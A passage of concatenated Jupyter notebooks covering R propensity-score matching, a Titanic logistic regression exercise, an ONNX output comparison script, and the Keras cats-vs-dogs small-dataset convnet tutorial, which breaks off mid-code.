xrange = seq(0,1,0.01)
# 3) subset your vectors to be inside xrange
g1 = subset(X,Tr==0)
g2 = subset(X,Tr==1)
# 4) Now, use hist to compute the counts per interval
h1 = hist(g1,breaks=xrange,plot=F)$counts
h2 = hist(g2,breaks=xrange,plot=F)$counts
barplot(rbind(h1,h2),col=3:2,names.arg=xrange[-1],
legend.text=c("No aline","Aline"),space=0,las=1,main="Stacked histogram of X")
library(Matching)
set.seed(43770)
ps <- Match(Y=NULL, Tr=Tr, X=X, M=1, estimand='ATT', caliper=0.1, exact=FALSE, replace=FALSE);
# get pairs with treatment/outcome as cols
outcome <- data.frame(aline_pt=y[ps$index.treated], match_pt=y[ps$index.control])
head(outcome)
# mcnemar's test to see if iac related to mort (test should use matched pairs)
tab.match1 <- table(outcome$aline_pt,outcome$match_pt,dnn=c("Aline","Matched Control"))
tab.match1
tab.match1[1,2]/tab.match1[2,1]
paste("95% Confint", round(exp(c(log(tab.match1[2,1]/tab.match1[1,2]) - qnorm(0.975)*sqrt(1/tab.match1[1,2] +1/tab.match1[2,1]),log(tab.match1[2,1]/tab.match1[1,2]) + qnorm(0.975)*sqrt(1/tab.match1[1,2] +1/tab.match1[2,1])) ),2))
mcnemar.test(tab.match1) # for 1-1 pairs
```
| github_jupyter |
# Logistic regression exercise with Titanic data
## Introduction
- Data from Kaggle's Titanic competition: [data](https://github.com/justmarkham/DAT8/blob/master/data/titanic.csv), [data dictionary](https://www.kaggle.com/c/titanic/data)
- **Goal**: Predict survival based on passenger characteristics
- `titanic.csv` is already in our repo, so there is no need to download the data from the Kaggle website
## Step 1: Read the data into Pandas
```
# Import libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
import sklearn
import seaborn as sns
import warnings
warnings.filterwarnings('ignore')
plt.rcParams["figure.figsize"] = [10,5]
url = 'https://raw.githubusercontent.com/justmarkham/DAT8/master/data/titanic.csv'
titanic = pd.read_csv(url, index_col='PassengerId')
titanic.head()
titanic.info()
# Heatmap
sns.heatmap(titanic.isnull(),yticklabels = False, cbar = False,cmap = 'tab20c_r')
plt.title('Missing Data: Training Set')
plt.show()
plt.figure(figsize = (10,7))
sns.boxplot(x = 'Pclass', y = 'Age', data = titanic, palette= 'GnBu_d').set_title('Age by Passenger Class')
plt.show()
# Imputation function
def impute_age(cols):
Age = cols[0]
Pclass = cols[1]
if pd.isnull(Age):
if Pclass == 1:
return 37
elif Pclass == 2:
return 29
else:
return 24
else:
return Age
# Apply the function to the Age column
titanic['Age']=titanic[['Age','Pclass']].apply(impute_age, axis =1 )
# Remove Cabin feature
titanic.drop('Cabin', axis = 1, inplace = True)
# Remove rows with missing data
titanic.dropna(inplace = True)
# Data types
print(titanic.info())
# Identify non-null objects
print('\n')
print('Non-Null Objects to Be Converted to Category')
print(titanic.select_dtypes(['object']).columns)
# Remove unnecessary columns
titanic.drop(['Name','Ticket'], axis = 1, inplace = True)
# Convert objects to category data type
objcat = ['Sex','Embarked']
for colname in objcat:
titanic[colname] = titanic[colname].astype('category')
# Numeric summary
titanic.describe().transpose()
# Survival Count
print('Target Variable')
print(titanic.groupby(['Survived']).Survived.count())
# Target Variable Countplot
sns.set_style('darkgrid')
plt.figure(figsize = (10,5))
sns.countplot(titanic['Survived'], alpha =.80, palette= ['grey','lightgreen'])
plt.title('Survivors vs Non-Survivors')
plt.ylabel('# Passengers')
plt.show()
#above you would use mode because a majority did not survive
#to impute nan values
# Identify numeric features
print('Continuous Variables')
print(titanic[['Age','Fare']].describe().transpose())
print('--'*40)
print('Discrete Variables')
print(titanic.groupby('Pclass').Pclass.count())
print(titanic.groupby('SibSp').SibSp.count())
print(titanic.groupby('Parch').Parch.count())
# Subplots of Numeric Features
sns.set_style('darkgrid')
fig = plt.figure(figsize = (20,16))
fig.subplots_adjust(hspace = .30)
ax1 = fig.add_subplot(321)
ax1.hist(titanic['Pclass'], bins = 20, alpha = .50,edgecolor= 'black',color ='teal')
ax1.set_xlabel('Pclass', fontsize = 15)
ax1.set_ylabel('# Passengers',fontsize = 15)
ax1.set_title('Passenger Class',fontsize = 15)
ax2 = fig.add_subplot(323)
ax2.hist(titanic['Age'], bins = 20, alpha = .50,edgecolor= 'black',color ='teal')
ax2.set_xlabel('Age',fontsize = 15)
ax2.set_ylabel('# Passengers',fontsize = 15)
ax2.set_title('Age of Passengers',fontsize = 15)
ax3 = fig.add_subplot(325)
ax3.hist(titanic['SibSp'], bins = 20, alpha = .50,edgecolor= 'black',color ='teal')
ax3.set_xlabel('SibSp',fontsize = 15)
ax3.set_ylabel('# Passengers',fontsize = 15)
ax3.set_title('Passengers with Spouses or Siblings',fontsize = 15)
ax4 = fig.add_subplot(222)
ax4.hist(titanic['Parch'], bins = 20, alpha = .50,edgecolor= 'black',color ='teal')
ax4.set_xlabel('Parch',fontsize = 15)
ax4.set_ylabel('# Passengers',fontsize = 15)
ax4.set_title('Passengers with Children',fontsize = 15)
ax5 = fig.add_subplot(224)
ax5.hist(titanic['Fare'], bins = 20, alpha = .50,edgecolor= 'black',color ='teal')
ax5.set_xlabel('Fare',fontsize = 15)
ax5.set_ylabel('# Passengers',fontsize = 15)
ax5.set_title('Ticket Fare',fontsize = 15)
plt.show()
# Passenger class summary
print('Passenger Class Summary')
print('\n')
print(titanic.groupby(['Pclass','Survived']).Pclass.count().unstack())
# Passenger class visualization
pclass = titanic.groupby(['Pclass','Survived']).Pclass.count().unstack()
p1 = pclass.plot(kind = 'bar', stacked = True,
title = 'Passengers by Class: Survivors vs Non-Survivors',
color = ['grey','lightgreen'], alpha = .70)
p1.set_xlabel('Pclass')
p1.set_ylabel('# Passengers')
p1.legend(['Did Not Survive','Survived'])
plt.show()
# SibSp Summary
print('Passengers with Siblings or Spouse')
print('\n')
print(titanic.groupby(['SibSp','Survived']).SibSp.count().unstack())
sibsp = titanic.groupby(['SibSp','Survived']).SibSp.count().unstack()
p2 = sibsp.plot(kind = 'bar', stacked = True,
color = ['grey','lightgreen'], alpha = .70)
p2.set_title('Passengers with Siblings or Spouse: Survivors vs Non-Survivors')
p2.set_xlabel('Sibsp')
p2.set_ylabel('# Passengers')
p2.legend(['Did Not Survive','Survived'])
plt.show()
print(titanic.groupby(['Parch','Survived']).Parch.count().unstack())
parch = titanic.groupby(['Parch','Survived']).Parch.count().unstack()
p3 = parch.plot(kind = 'bar', stacked = True,
color = ['grey','lightgreen'], alpha = .70)
p3.set_title('Passengers with Children: Survivors vs Non-Survivors')
p3.set_xlabel('Parch')
p3.set_ylabel('# Passengers')
p3.legend(['Did Not Survive','Survived'])
plt.show()
# titanic.hist(bins=10,figsize=(9,7),grid=False)
# Statistical summary of continuous variables
print('Statistical Summary of Age and Fare')
print('\n')
print('Did Not Survive')
print(titanic[titanic['Survived']==0][['Age','Fare']].describe().transpose())
print('--'*40)
print('Survived')
print(titanic[titanic['Survived']==1][['Age','Fare']].describe().transpose())
# Subplots of Numeric Features
sns.set_style('darkgrid')
fig = plt.figure(figsize = (16,10))
fig.subplots_adjust(hspace = .30)
ax1 = fig.add_subplot(221)
ax1.hist(titanic[titanic['Survived'] ==0].Age, bins = 25, label ='Did Not Survive', alpha = .50,edgecolor= 'black',color ='grey')
ax1.hist(titanic[titanic['Survived']==1].Age, bins = 25, label = 'Survive', alpha = .50, edgecolor = 'black',color = 'lightgreen')
ax1.set_title('Passenger Age: Survivors vs Non-Survivors')
ax1.set_xlabel('Age')
ax1.set_ylabel('# Passengers')
ax1.legend(loc = 'upper right')
ax2 = fig.add_subplot(223)
ax2.hist(titanic[titanic['Survived']==0].Fare, bins = 25, label = 'Did Not Survive', alpha = .50, edgecolor ='black', color = 'grey')
ax2.hist(titanic[titanic['Survived']==1].Fare, bins = 25, label = 'Survive', alpha = .50, edgecolor = 'black',color ='lightgreen')
ax2.set_title('Ticket Fare: Suvivors vs Non-Survivors')
ax2.set_xlabel('Fare')
ax2.set_ylabel('# Passenger')
ax2.legend(loc = 'upper right')
ax3 = fig.add_subplot(122)
ax3.scatter(x = titanic[titanic['Survived']==0].Age, y = titanic[titanic['Survived']==0].Fare,
alpha = .50,edgecolor= 'black', c = 'grey', s= 75, label = 'Did Not Survive')
ax3.scatter(x = titanic[titanic['Survived']==1].Age, y = titanic[titanic['Survived']==1].Fare,
alpha = .50,edgecolors= 'black', c = 'lightgreen', s= 75, label = 'Survived')
ax3.set_xlabel('Age')
ax3.set_ylabel('Fare')
ax3.set_title('Age of Passengers vs Fare')
ax3.legend()
plt.show()
# above, instead of count of passengers, density = True. Gives you percentages
# it states that a lot of people did not pay for ticket. They're likely the staff
# no siblings or spouses, no children. Likely in the middle age range
# linear relationship between age and log-odds of survival
# definitely not linear
# what feature might you engineer to capture this weirdness with age?
# like you might have a better chance to survive if you're older
# dummy variable for are you children or not
# Identify categorical features
titanic.select_dtypes(['category']).columns
# Suplots of categorical features v price
sns.set_style('darkgrid')
f, axes = plt.subplots(1,2, figsize = (15,5))
# Plot [0]
sns.countplot(x = 'Sex', data = titanic, palette = 'GnBu_d', ax = axes[0])
axes[0].set_xlabel('Sex')
axes[0].set_ylabel('# Passengers')
axes[0].set_title('Gender of Passengers')
# Plot [1]
sns.countplot(x = 'Embarked', data = titanic, palette = 'GnBu_d',ax = axes[1])
axes[1].set_xlabel('Embarked')
axes[1].set_ylabel('# Passengers')
axes[1].set_title('Embarked')
plt.show()
# Suplots of categorical features v price
sns.set_style('darkgrid')
f, axes = plt.subplots(1,2, figsize = (20,7))
gender = titanic.groupby(['Sex','Survived']).Sex.count().unstack()
p1 = gender.plot(kind = 'bar', stacked = True,
title = 'Gender: Survivers vs Non-Survivors',
color = ['grey','lightgreen'], alpha = .70, ax = axes[0])
p1.set_xlabel('Sex')
p1.set_ylabel('# Passengers')
p1.legend(['Did Not Survive','Survived'])
embarked = titanic.groupby(['Embarked','Survived']).Embarked.count().unstack()
p2 = embarked.plot(kind = 'bar', stacked = True,
title = 'Embarked: Survivers vs Non-Survivors',
color = ['grey','lightgreen'], alpha = .70, ax = axes[1])
p2.set_xlabel('Embarked')
p2.set_ylabel('# Passengers')
p2.legend(['Did Not Survive','Survived'])
plt.show()
# Shape of train data
titanic.shape
# Identify categorical features
titanic.select_dtypes(['category']).columns
# Convert categorical variables into 'dummy' or indicator variables
sex = pd.get_dummies(titanic['Sex'], drop_first = True) # drop_first prevents multi-collinearity
embarked = pd.get_dummies(titanic['Embarked'], drop_first = True)
# Add new dummy columns to data frame
titanic = pd.concat([titanic, sex, embarked], axis = 1)
titanic.head(2)
# Drop unecessary columns
titanic.drop(['Sex', 'Embarked'], axis = 1, inplace = True)
# Shape of train data
print('train_data shape',titanic.shape)
# Confirm changes
titanic.head()
```
## Step 2: Create X and y
Define **Pclass** and **Parch** as the features, and **Survived** as the response.
```
# Split data to be used in the models
# Create matrix of features
X = titanic.drop('Survived', axis = 1) # grabs everything else but 'Survived'
# Create target variable
y = titanic['Survived'] # y is the column we're trying to predict
```
## Step 3: Split the data into training and testing sets
```
# Use x and y variables to split the training data into train and test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=1)
```
## Step 4: Fit a logistic regression model and examine the coefficients
Confirm that the coefficients make intuitive sense.
```
from sklearn.linear_model import LogisticRegression
logreg = LogisticRegression()
logreg.fit(X_train, y_train)
zip(X_train.columns, logreg.coef_[0])
logreg.coef_
```
## Step 5: Make predictions on the testing set and calculate the accuracy
```
# class predictions (not predicted probabilities)
y_pred_class = logreg.predict(X_test)
# calculate classification accuracy
from sklearn import metrics
print(metrics.accuracy_score(y_test, y_pred_class))
```
## Step 6: Compare your testing accuracy to the null accuracy
```
# this works regardless of the number of classes
y_test.value_counts().head(1) / len(y_test)
# this only works for binary classification problems coded as 0/1
max(y_test.mean(), 1 - y_test.mean())
```
# Confusion matrix of Titanic predictions
```
# print confusion matrix
print(metrics.confusion_matrix(y_test, y_pred_class))
# save confusion matrix and slice into four pieces
confusion = metrics.confusion_matrix(y_test, y_pred_class)
TP = confusion[1][1]
TN = confusion[0][0]
FP = confusion[0][1]
FN = confusion[1][0]
print ('True Positives:', TP)
print ('True Negatives:', TN)
print ('False Positives:', FP)
print ('False Negatives:', FN)
# calculate the sensitivity
print TP / float(TP + FN)
print 44 / float(44 + 51)
# calculate the specificity
print (TN / float(TN + FP))
print (105 / float(105 + 23))
# store the predicted probabilities
y_pred_prob = logreg.predict_proba(X_test)[:, 1]
# histogram of predicted probabilities
%matplotlib inline
import matplotlib.pyplot as plt
plt.hist(y_pred_prob)
plt.xlim(0, 1)
plt.xlabel('Predicted probability of survival')
plt.ylabel('Frequency')
# increase sensitivity by lowering the threshold for predicting survival
import numpy as np
y_pred_class = np.where(y_pred_prob > 0.3, 1, 0)
# old confusion matrix
print (confusion)
# new confusion matrix
print (metrics.confusion_matrix(y_test, y_pred_class))
# new sensitivity (higher than before)
print (63 / float(63 + 32))
# new specificity (lower than before)
print (72 / float(72 + 56))
```
| github_jupyter |
```
import onnx
from onnx import shape_inference
import warnings
from onnx_tf.backend import prepare
import numpy as np
def stride_print(input):
tensor = input.flatten().tolist()
length = len(tensor)
size = 20
stride = length//size
if stride == 0:
stride = 1
size = length // stride
nums = []
for i in range(0, size):
item = tensor[i * stride]
# nums.append(str(i * stride) + ": " + str(item))
nums.append(str(item))
print(nums)
# for i in range(0, size):
# item = tensor[i * stride]
# print ("{} ".format(item),end="")
dot = "•"
black = lambda x: "\033[30m" + str(x) + "\033[0m"
red = lambda x: "\033[31m" + str(x) + "\033[0m"
green = lambda x: "\033[32m" + str(x) + "\033[0m"
yellow = lambda x: "\033[33m" + str(x) + "\033[0m"
reset = lambda x: "\033[0m" + str(x)
def pp_tab(x, level=0):
header = ""
for i in range(0, level):
header += "\t"
print(header + str(x))
def pp_black(x, level=0):
pp_tab(black(x) + reset(""), level)
def pp_red(x, level=0):
pp_tab(red(x) + reset(""), level)
def pp_green(x, level=0):
pp_tab(green(x) + reset(""), level)
def pp_yellow(x, level=0):
pp_tab(yellow(x) + reset(""), level)
diff_threadhold = 0.05
def compare(input):
stride_print(input)
tensor = input.flatten().tolist()
length = len(tensor)
size = 20
stride = length//size
if stride == 0:
stride = 1
size = length // stride
nums = []
for i in range(0, size):
item = tensor[i * stride]
# nums.append(str(i * stride) + ": " + str(item))
nums.append(item)
diff_ = 0
is_pass = True
for i in range(0,size):
right_v = nums[i]
paddle_v = float(input_paddle[i])
diff=abs(right_v-paddle_v)
diff_+=diff
if (diff>diff_threadhold):
is_pass = False
print("err at {} {} {} ".format(i,right_v,paddle_v))
if(is_pass):
pp_green("passed with avg diff is {}".format(diff_/size))
else:
pp_red("not pass!")
model = onnx.load("v18_7_6_2_leakyReLU_rgb_mask_test_t2.onnx")
onnx.checker.check_model(model)
inferred_model = shape_inference.infer_shapes(model)
model.graph.output.extend(inferred_model.graph.value_info)
warnings.filterwarnings('ignore')
tfm = prepare(model)
# input = np.fromfile('input', dtype=np.float32).reshape(1, 3, 256, 256)
input = np.loadtxt('./input_1_3_256_256',
dtype=np.float32).reshape(1, 3, 256, 256)
res = tfm.run(input)
input_paddle = "0.53125 0.549316 0.558594 0.677246 0.470703 0.634766 0.540039 0.566406 0.495605 0.597168 0.602539 0.480957 0.448486 0.553711 0.474365 0.612793 0.609863 0.518555 0.617188 0.505371 0.504395".split(" ")
compare(res["mask"])
input_paddle = "0.245117 -0.222656 0.0887451 0.803711 0.639648 0.0995483 0.807129 -0.224609 -0.267578 0.33667 0.372559 -0.353516 0.343262 0.549805 0.344971 0.503906 0.152466 -0.0531616 0.0315247 -0.0397034 -0.218262".split(" ")
compare(res["rgb"])
```
| github_jupyter |
```
import keras
keras.__version__
```
# 5.2 - Using convnets with small datasets
This notebook contains the code sample found in Chapter 5, Section 2 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.
## Training a convnet from scratch on a small dataset
Having to train an image classification model using only very little data is a common situation, which you likely encounter yourself in
practice if you ever do computer vision in a professional context.
Having "few" samples can mean anywhere from a few hundreds to a few tens of thousands of images. As a practical example, we will focus on
classifying images as "dogs" or "cats", in a dataset containing 4000 pictures of cats and dogs (2000 cats, 2000 dogs). We will use 2000
pictures for training, 1000 for validation, and finally 1000 for testing.
In this section, we will review one basic strategy to tackle this problem: training a new model from scratch on what little data we have. We
will start by naively training a small convnet on our 2000 training samples, without any regularization, to set a baseline for what can be
achieved. This will get us to a classification accuracy of 71%. At that point, our main issue will be overfitting. Then we will introduce
*data augmentation*, a powerful technique for mitigating overfitting in computer vision. By leveraging data augmentation, we will improve
our network to reach an accuracy of 82%.
In the next section, we will review two more essential techniques for applying deep learning to small datasets: *doing feature extraction
with a pre-trained network* (this will get us to an accuracy of 90% to 93%), and *fine-tuning a pre-trained network* (this will get us to
our final accuracy of 95%). Together, these three strategies -- training a small model from scratch, doing feature extracting using a
pre-trained model, and fine-tuning a pre-trained model -- will constitute your future toolbox for tackling the problem of doing computer
vision with small datasets.
## The relevance of deep learning for small-data problems
You will sometimes hear that deep learning only works when lots of data is available. This is in part a valid point: one fundamental
characteristic of deep learning is that it is able to find interesting features in the training data on its own, without any need for manual
feature engineering, and this can only be achieved when lots of training examples are available. This is especially true for problems where
the input samples are very high-dimensional, like images.
However, what constitutes "lots" of samples is relative -- relative to the size and depth of the network you are trying to train, for
starters. It isn't possible to train a convnet to solve a complex problem with just a few tens of samples, but a few hundreds can
potentially suffice if the model is small and well-regularized and if the task is simple.
Because convnets learn local, translation-invariant features, they are very
data-efficient on perceptual problems. Training a convnet from scratch on a very small image dataset will still yield reasonable results
despite a relative lack of data, without the need for any custom feature engineering. You will see this in action in this section.
But what's more, deep learning models are by nature highly repurposable: you can take, say, an image classification or speech-to-text model
trained on a large-scale dataset then reuse it on a significantly different problem with only minor changes. Specifically, in the case of
computer vision, many pre-trained models (usually trained on the ImageNet dataset) are now publicly available for download and can be used
to bootstrap powerful vision models out of very little data. That's what we will do in the next section.
For now, let's get started by getting our hands on the data.
## Downloading the data
The cats vs. dogs dataset that we will use isn't packaged with Keras. It was made available by Kaggle.com as part of a computer vision
competition in late 2013, back when convnets weren't quite mainstream. You can download the original dataset at:
`https://www.kaggle.com/c/dogs-vs-cats/data` (you will need to create a Kaggle account if you don't already have one -- don't worry, the
process is painless).
The pictures are medium-resolution color JPEGs. They look like this:

Unsurprisingly, the cats vs. dogs Kaggle competition in 2013 was won by entrants who used convnets. The best entries could achieve up to
95% accuracy. In our own example, we will get fairly close to this accuracy (in the next section), even though we will be training our
models on less than 10% of the data that was available to the competitors.
This original dataset contains 25,000 images of dogs and cats (12,500 from each class) and is 543MB large (compressed). After downloading
and uncompressing it, we will create a new dataset containing three subsets: a training set with 1000 samples of each class, a validation
set with 500 samples of each class, and finally a test set with 500 samples of each class.
Here are a few lines of code to do this:
```
import os, shutil
# The path to the directory where the original
# dataset was uncompressed
original_dataset_dir = '/Users/fchollet/Downloads/kaggle_original_data'
# The directory where we will
# store our smaller dataset
base_dir = '/Users/fchollet/Downloads/cats_and_dogs_small'
os.mkdir(base_dir)
# Directories for our training,
# validation and test splits
train_dir = os.path.join(base_dir, 'train')
os.mkdir(train_dir)
validation_dir = os.path.join(base_dir, 'validation')
os.mkdir(validation_dir)
test_dir = os.path.join(base_dir, 'test')
os.mkdir(test_dir)
# Directory with our training cat pictures
train_cats_dir = os.path.join(train_dir, 'cats')
os.mkdir(train_cats_dir)
# Directory with our training dog pictures
train_dogs_dir = os.path.join(train_dir, 'dogs')
os.mkdir(train_dogs_dir)
# Directory with our validation cat pictures
validation_cats_dir = os.path.join(validation_dir, 'cats')
os.mkdir(validation_cats_dir)
# Directory with our validation dog pictures
validation_dogs_dir = os.path.join(validation_dir, 'dogs')
os.mkdir(validation_dogs_dir)
# Directory with our validation cat pictures
test_cats_dir = os.path.join(test_dir, 'cats')
os.mkdir(test_cats_dir)
# Directory with our validation dog pictures
test_dogs_dir = os.path.join(test_dir, 'dogs')
os.mkdir(test_dogs_dir)
# Copy first 1000 cat images to train_cats_dir
fnames = ['cat.{}.jpg'.format(i) for i in range(1000)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(train_cats_dir, fname)
shutil.copyfile(src, dst)
# Copy next 500 cat images to validation_cats_dir
fnames = ['cat.{}.jpg'.format(i) for i in range(1000, 1500)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(validation_cats_dir, fname)
shutil.copyfile(src, dst)
# Copy next 500 cat images to test_cats_dir
fnames = ['cat.{}.jpg'.format(i) for i in range(1500, 2000)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(test_cats_dir, fname)
shutil.copyfile(src, dst)
# Copy first 1000 dog images to train_dogs_dir
fnames = ['dog.{}.jpg'.format(i) for i in range(1000)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(train_dogs_dir, fname)
shutil.copyfile(src, dst)
# Copy next 500 dog images to validation_dogs_dir
fnames = ['dog.{}.jpg'.format(i) for i in range(1000, 1500)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(validation_dogs_dir, fname)
shutil.copyfile(src, dst)
# Copy next 500 dog images to test_dogs_dir
fnames = ['dog.{}.jpg'.format(i) for i in range(1500, 2000)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(test_dogs_dir, fname)
shutil.copyfile(src, dst)
```
As a sanity check, let's count how many pictures we have in each training split (train/validation/test):
```
print('total training cat images:', len(os.listdir(train_cats_dir)))
print('total training dog images:', len(os.listdir(train_dogs_dir)))
print('total validation cat images:', len(os.listdir(validation_cats_dir)))
print('total validation dog images:', len(os.listdir(validation_dogs_dir)))
print('total test cat images:', len(os.listdir(test_cats_dir)))
print('total test dog images:', len(os.listdir(test_dogs_dir)))
```
So we have indeed 2000 training images, and then 1000 validation images and 1000 test images. In each split, there is the same number of
samples from each class: this is a balanced binary classification problem, which means that classification accuracy will be an appropriate
measure of success.
## Building our network
We've already built a small convnet for MNIST in the previous example, so you should be familiar with them. We will reuse the same
general structure: our convnet will be a stack of alternated `Conv2D` (with `relu` activation) and `MaxPooling2D` layers.
However, since we are dealing with bigger images and a more complex problem, we will make our network accordingly larger: it will have one
more `Conv2D` + `MaxPooling2D` stage. This serves both to augment the capacity of the network, and to further reduce the size of the
feature maps, so that they aren't overly large when we reach the `Flatten` layer. Here, since we start from inputs of size 150x150 (a
somewhat arbitrary choice), we end up with feature maps of size 7x7 right before the `Flatten` layer.
Note that the depth of the feature maps is progressively increasing in the network (from 32 to 128), while the size of the feature maps is
decreasing (from 148x148 to 7x7). This is a pattern that you will see in almost all convnets.
Since we are attacking a binary classification problem, we are ending the network with a single unit (a `Dense` layer of size 1) and a
`sigmoid` activation. This unit will encode the probability that the network is looking at one class or the other.
```
from keras import layers
from keras import models
model = models.Sequential()
model.add(layers.Conv2D(32, (3, 3), activation='relu',
input_shape=(150, 150, 3)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(128, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(128, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Flatten())
model.add(layers.Dense(512, activation='relu'))
model.add(layers.Dense(1, activation='sigmoid'))
```
Let's take a look at how the dimensions of the feature maps change with every successive layer:
```
model.summary()
```
For our compilation step, we'll go with the `RMSprop` optimizer as usual. Since we ended our network with a single sigmoid unit, we will
use binary crossentropy as our loss (as a reminder, check out the table in Chapter 4, section 5 for a cheatsheet on what loss function to
use in various situations).
```
from keras import optimizers
model.compile(loss='binary_crossentropy',
optimizer=optimizers.RMSprop(lr=1e-4),
metrics=['acc'])
```
## Data preprocessing
As you already know by now, data should be formatted into appropriately pre-processed floating point tensors before being fed into our
network. Currently, our data sits on a drive as JPEG files, so the steps for getting it into our network are roughly:
* Read the picture files.
* Decode the JPEG content to RBG grids of pixels.
* Convert these into floating point tensors.
* Rescale the pixel values (between 0 and 255) to the [0, 1] interval (as you know, neural networks prefer to deal with small input values).
It may seem a bit daunting, but thankfully Keras has utilities to take care of these steps automatically. Keras has a module with image
processing helper tools, located at `keras.preprocessing.image`. In particular, it contains the class `ImageDataGenerator` which allows to
quickly set up Python generators that can automatically turn image files on disk into batches of pre-processed tensors. This is what we
will use here.
```
from keras.preprocessing.image import ImageDataGenerator
# All images will be rescaled by 1./255
train_datagen = ImageDataGenerator(rescale=1./255)
test_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
# This is the target directory
train_dir,
# All images will be resized to 150x150
target_size=(150, 150),
batch_size=20,
# Since we use binary_crossentropy loss, we need binary labels
class_mode='binary')
validation_generator = test_datagen.flow_from_directory(
validation_dir,
target_size=(150, 150),
batch_size=20,
class_mode='binary')
```
Let's take a look at the output of one of these generators: it yields batches of 150x150 RGB images (shape `(20, 150, 150, 3)`) and binary
labels (shape `(20,)`). 20 is the number of samples in each batch (the batch size). Note that the generator yields these batches
indefinitely: it just loops endlessly over the images present in the target folder. For this reason, we need to `break` the iteration loop
at some point.
```
for data_batch, labels_batch in train_generator:
print('data batch shape:', data_batch.shape)
print('labels batch shape:', labels_batch.shape)
break
```
Let's fit our model to the data using the generator. We do it using the `fit_generator` method, the equivalent of `fit` for data generators
like ours. It expects as first argument a Python generator that will yield batches of inputs and targets indefinitely, like ours does.
Because the data is being generated endlessly, the generator needs to know example how many samples to draw from the generator before
declaring an epoch over. This is the role of the `steps_per_epoch` argument: after having drawn `steps_per_epoch` batches from the
generator, i.e. after having run for `steps_per_epoch` gradient descent steps, the fitting process will go to the next epoch. In our case,
batches are 20-sample large, so it will take 100 batches until we see our target of 2000 samples.
When using `fit_generator`, one may pass a `validation_data` argument, much like with the `fit` method. Importantly, this argument is
allowed to be a data generator itself, but it could be a tuple of Numpy arrays as well. If you pass a generator as `validation_data`, then
this generator is expected to yield batches of validation data endlessly, and thus you should also specify the `validation_steps` argument,
which tells the process how many batches to draw from the validation generator for evaluation.
```
history = model.fit_generator(
train_generator,
steps_per_epoch=100,
epochs=30,
validation_data=validation_generator,
validation_steps=50)
```
It is good practice to always save your models after training:
```
model.save('cats_and_dogs_small_1.h5')
```
Let's plot the loss and accuracy of the model over the training and validation data during training:
```
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(acc))
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.legend()
plt.figure()
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.legend()
plt.show()
```
These plots are characteristic of overfitting. Our training accuracy increases linearly over time, until it reaches nearly 100%, while our
validation accuracy stalls at 70-72%. Our validation loss reaches its minimum after only five epochs then stalls, while the training loss
keeps decreasing linearly until it reaches nearly 0.
Because we only have relatively few training samples (2000), overfitting is going to be our number one concern. You already know about a
number of techniques that can help mitigate overfitting, such as dropout and weight decay (L2 regularization). We are now going to
introduce a new one, specific to computer vision, and used almost universally when processing images with deep learning models: *data
augmentation*.
## Using data augmentation
Overfitting is caused by having too few samples to learn from, rendering us unable to train a model able to generalize to new data.
Given infinite data, our model would be exposed to every possible aspect of the data distribution at hand: we would never overfit. Data
augmentation takes the approach of generating more training data from existing training samples, by "augmenting" the samples via a number
of random transformations that yield believable-looking images. The goal is that at training time, our model would never see the exact same
picture twice. This helps the model get exposed to more aspects of the data and generalize better.
In Keras, this can be done by configuring a number of random transformations to be performed on the images read by our `ImageDataGenerator`
instance. Let's get started with an example:
```
datagen = ImageDataGenerator(
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest')
```
These are just a few of the options available (for more, see the Keras documentation). Let's quickly go over what we just wrote:
* `rotation_range` is a value in degrees (0-180), a range within which to randomly rotate pictures.
* `width_shift` and `height_shift` are ranges (as a fraction of total width or height) within which to randomly translate pictures
vertically or horizontally.
* `shear_range` is for randomly applying shearing transformations.
* `zoom_range` is for randomly zooming inside pictures.
* `horizontal_flip` is for randomly flipping half of the images horizontally -- relevant when there are no assumptions of horizontal
asymmetry (e.g. real-world pictures).
* `fill_mode` is the strategy used for filling in newly created pixels, which can appear after a rotation or a width/height shift.
Let's take a look at our augmented images:
```
# This is module with image preprocessing utilities
from keras.preprocessing import image
fnames = [os.path.join(train_cats_dir, fname) for fname in os.listdir(train_cats_dir)]
# We pick one image to "augment"
img_path = fnames[3]
# Read the image and resize it
img = image.load_img(img_path, target_size=(150, 150))
# Convert it to a Numpy array with shape (150, 150, 3)
x = image.img_to_array(img)
# Reshape it to (1, 150, 150, 3)
x = x.reshape((1,) + x.shape)
# The .flow() command below generates batches of randomly transformed images.
# It will loop indefinitely, so we need to `break` the loop at some point!
i = 0
for batch in datagen.flow(x, batch_size=1):
plt.figure(i)
imgplot = plt.imshow(image.array_to_img(batch[0]))
i += 1
if i % 4 == 0:
break
plt.show()
```
If we train a new network using this data augmentation configuration, our network will never see twice the same input. However, the inputs
that it sees are still heavily intercorrelated, since they come from a small number of original images -- we cannot produce new information,
we can only remix existing information. As such, this might not be quite enough to completely get rid of overfitting. To further fight
overfitting, we will also add a Dropout layer to our model, right before the densely-connected classifier:
```
model = models.Sequential()
